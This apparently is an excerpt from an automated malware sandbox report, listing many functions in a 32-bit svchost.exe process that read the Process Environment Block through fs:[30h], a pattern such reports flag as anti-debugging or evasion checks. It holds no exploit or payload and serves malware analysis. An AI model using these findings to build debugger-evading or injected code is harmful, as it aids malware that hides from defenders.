              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE47A0 mov eax, dword ptr fs:[00000030h]1_2_02FE47A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]1_2_03004B00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h]1_2_02FBCA11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h]1_2_02F38BF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h]1_2_02F5EBFC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02FBCBF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02FDEBD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h]1_2_02F50BCB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h]1_2_02F30BCD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h]1_2_02F40BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]1_2_02FE4BB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h]1_2_03004A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]1_2_02F2CB7E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h]1_2_02F28B50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]1_2_02FDEB50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]1_2_02FE4B4B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]1_2_02FC6B40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]1_2_02FFAB40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]1_2_02FD8B42
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]1_2_02F5EB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]1_2_02FF8B28
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]1_2_02FAEB1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02F6C8F9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02FFA8E4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02F5E8C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004940 mov eax, dword ptr fs:[00000030h]1_2_03004940
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]1_2_02FBC89D
